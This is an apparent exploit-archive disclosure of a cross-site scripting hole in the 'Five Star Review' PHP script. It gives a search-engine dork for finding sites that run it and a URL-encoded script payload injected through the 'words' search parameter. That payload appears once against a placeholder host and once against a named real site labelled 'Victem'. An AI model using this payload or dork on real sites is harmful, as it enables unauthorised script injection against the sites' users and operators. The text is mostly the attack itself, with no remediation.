######################################################### --------------------------------------------------------- Portal Name: Review Script Vendor : http://review-script.com Vulnerable File : Search Dork: Powered by Five Star Review Author : Pouya_Server , Pouya.s3rver@Gmail.com Vulnerability : XSS (Cross site scripting) --------------------------------------------------------- ######################################################### http://www.site.com/review/search/index.php?cmd=search&words=%3Cmarquee%3EXSSED_bY_Pouya_Server%3C/marquee%3%27%3E%3Cscript%3Ealert%28%27Pouya_Server%27%29%3C%2Fscript%3EE&searchWhere=0&mode=normal --------------------------------- Victem : http://www.rental-script.com/review/search/index.php?cmd=search&words=%3Cmarquee%3EXSSED_bY_Pouya_Server%3C/marquee%3%27%3E%3Cscript%3Ealert%28%27Pouya_Server%27%29%3C%2Fscript%3EE&searchWhere=0&mode=normal